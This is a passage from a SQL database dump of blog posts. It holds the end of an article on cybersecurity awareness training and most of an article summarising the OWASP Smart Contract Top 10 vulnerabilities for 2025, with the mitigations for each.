value=\"3\"><b><strong class=\"font-bold\">Running drills</strong></b> to mimic cyberattacks and test the organization’s readiness.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] 
pt-[9px] pb-[2px]\" dir=\"ltr\">With trained employees and a robust response plan, businesses can recover more effectively when faced with an attack.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Measuring the Effectiveness of Cybersecurity Training</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">How do you know if your cybersecurity training is working? Measuring its effectiveness is crucial for making ongoing improvements.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Employee Assessments</strong></b>: Regular knowledge checks or post-training quizzes can reveal whether employees are internalizing key concepts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Incident Reports</strong></b>: Fewer security incidents involving human error (e.g., clicking on phishing emails) indicate improved awareness. Raw incident counts are noisy, so track them alongside how quickly and how often staff report suspicious messages.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Simulations</strong></b>: Set up phishing or breach simulations to evaluate employees’ ability to detect threats. Measure the reporting rate as well as the click rate: a simulated phish that is clicked but promptly reported still gives the security team time to respond, whereas one that is ignored does not.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Feedback and Surveys</strong></b>: Collect feedback from employees to understand which areas of training were most helpful or require 
clarification.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Continuous monitoring ensures that training programs remain impactful and relevant.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Future of Cybersecurity and the Importance of Ongoing Training</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The future of cybersecurity promises more advanced technologies—and, with them, more complex threats. AI-driven malware, quantum computing, and the Internet of Things (IoT) will add new layers of security risks for organizations of all sizes.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To stay ahead, organizations must view cybersecurity awareness training as an ongoing process rather than a one-time event. Regular updates, tailored strategies, and leadership commitment are critical to maintaining a security-conscious workforce.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Empowering a Secure Digital Future</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity awareness training is not just a checkbox; it’s a necessity for every modern organization. 
Empower your employees, strengthen your incident response strategies, and create a culture where security comes first.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether you’re an IT professional designing your first training plan or a small business owner ready to secure your operations, investing in employee education is a step toward a safer, more resilient future.</p>', '', NULL, NULL, 1, 'draft', '2025-01-23 15:22:57', '2026-01-12 21:41:44', 'Information Security', 'The Importance of Cybersecurity Awareness Training', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(64, 'OWASP Top 10 Smart Contract Vulnerabilities for 2025', 'owasp-top-10-smart-contract-vulnerabilities-for-2025', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Smart contracts lie at the heart of blockchain innovation, enabling decentralized applications (dApps) and seamless transactions. However, they also introduce unique security challenges. To address these, the OWASP Smart Contract Top 10 for 2025 (a separate list from the better-known OWASP Top 10 for web applications) identifies the most critical vulnerabilities developers, auditors, and security professionals must consider to maintain secure and robust blockchain ecosystems.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By fortifying smart contracts against these vulnerabilities, developers can minimize risks, protecting both assets and the trust users place in decentralized technologies.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Access Control Vulnerabilities</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Access control issues occur when smart contracts fail to enforce proper permissions, allowing unauthorized users to access or modify sensitive data or functions. 
This can lead to severe breaches, such as stolen assets or critical system alterations.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Unauthorized minting of tokens</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Unauthorized asset transfers</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Access Control Vulnerabilities:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Implement strict role-based access controls.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use industry-tested libraries for permission checks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Conduct regular audits to identify and fix misconfiguration.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. 
<b><strong class=\"font-bold\">Price Oracle Manipulation</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Price oracles fetch external data for smart contracts. If these oracles are compromised, attackers can tamper with data feeds, causing financial losses or operational failures.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Manipulating token prices to exploit DeFi lending platforms</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Forcing liquidation of assets at manipulated values</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Price Oracle Manipulation:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use decentralized oracles, such as Chainlink, to reduce dependency on a single source.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Include sanity checks to validate fetched data.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. 
<b><strong class=\"font-bold\">Logic Errors in Business Logic</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Logic errors result when smart contracts deviate from intended functionality, often leading to costly mistakes. These vulnerabilities can arise from flawed coding or shallow domain knowledge.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Incorrect token distribution during launches</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Lending platform miscalculations resulting in fund loss</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Logic Errors:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Conduct robust unit and integration testing throughout development.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Collaborate with domain experts to ensure the accuracy of business logic.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. 
<b><strong class=\"font-bold\">Lack of Input Validation</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When contracts fail to validate user inputs, they become susceptible to malicious manipulation. Unchecked inputs may disrupt a contract’s logic or trigger unintended behaviors.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Malicious payloads bypassing intended transaction limits</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Incorrect function execution due to invalid parameter inputs</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Lack of Input Validation:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Rigorously validate all user inputs during development.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Integrate defensive programming techniques to safeguard contract logic.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. 
<b><strong class=\"font-bold\">Reentrancy Attacks</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A reentrancy vulnerability arises when a contract makes an external call before it has finished updating its own state, allowing the called contract to re-enter the vulnerable function repeatedly before the initial execution completes. This can lead to drained contract funds or disrupted operations.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Exploiting withdrawal functions in DeFi protocols</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Manipulating account balances via recursive calls</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Reentrancy Attacks:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Follow the “Checks-Effects-Interactions” pattern when structuring functions: validate inputs, update state, and only then make external calls.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use reentrancy guards from trusted libraries like OpenZeppelin, keeping in mind that a guard only protects the functions it is applied to; cross-function and cross-contract reentrancy still depend on updating state before any external call.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. 
<b><strong class=\"font-bold\">Unchecked External Calls</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When a contract fails to handle external call results properly, it can lead to unintended behaviors, resulting in potential loss of funds or data integrity issues.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Triggering unintended consequences due to failed contract interactions</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Exploiting unchecked call returns to bypass intended outcomes</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Unchecked External Calls:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Always verify the success of external function calls. In particular, the low-level call, delegatecall and send primitives return a boolean instead of reverting on failure, so an unchecked return value silently ignores the error.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Limit external calls to minimize opportunities for exploitation.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. 
<b><strong class=\"font-bold\">Flash Loan Attacks</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Typically used for legitimate purposes, flash loans can be exploited to manipulate financial protocols within a single transaction. Attackers often use flash loans to drain liquidity or exploit arbitrary logic.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Artificially inflating token prices and dumping their holdings</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Draining liquidity from decentralized exchanges (DEXs)</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Flash Loan Attacks:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Introduce sanity checks for multi-operation transactions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Impose time-locks or delays on specific high-risk functionalities.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. 
<b><strong class=\"font-bold\">Integer Overflow and Underflow</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Integer overflows and underflows occur when numeric values push beyond or below their designated limits. Such errors often result in miscalculations or exploits, including unauthorized token generation.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Tokens \"wrapping around\" to astronomically high balances</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Severe fund mismanagement in financial contracts</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Integer Overflow and Underflow:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Leverage safe math libraries, such as SafeMath, for contracts compiled with Solidity versions older than 0.8.0.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use Solidity’s built-in checked arithmetic for contracts written in version 0.8.0+, where SafeMath is redundant; review any unchecked blocks and inline assembly separately, because those checks do not apply there.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">9. 
<b><strong class=\"font-bold\">Insecure Randomness</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Generating secure randomness in a deterministic blockchain environment is challenging: every input a contract can read is public, and some of it is chosen by the block producer. Predictable or controllable random numbers can lead to exploitation in lotteries, token distributions, or similar processes.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Exploited lotteries due to predictable block timestamps</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Abused predictive algorithms for token airdrops</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate Insecure Randomness:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use reliable sources like Chainlink’s VRF (Verifiable Random Function), and verify the proof on-chain rather than trusting the returned value.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Avoid using blockchain parameters (e.g., block timestamps, block hashes or prevrandao) for randomness; they are visible to everyone and can be influenced by block producers. Where an oracle is not an option, a commit-reveal scheme is the usual fallback.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">10. 
<b><strong class=\"font-bold\">Denial of Service (DoS) Attacks</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">DoS attacks aim to exhaust resources, rendering a smart contract non-functional. These attacks are designed to disrupt normal operations, often by exploiting inefficiencies like high gas consumption, or by deliberately making an external call fail so that a function which depends on it can never complete.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Examples:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Gas-intensive loops preventing the execution of critical functions</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Overloading inputs to strain contract processing capacities</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate DoS Attacks:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Optimize gas usage within smart contracts by minimizing computation-heavy functions, and never loop over arrays whose length users can grow without bound.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Limit user inputs to prevent resource overuse, and prefer a pull-over-push pattern for payouts (each recipient withdraws their own funds) so that a single reverting or gas-greedy recipient cannot block everyone else.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Addressing These Vulnerabilities is 
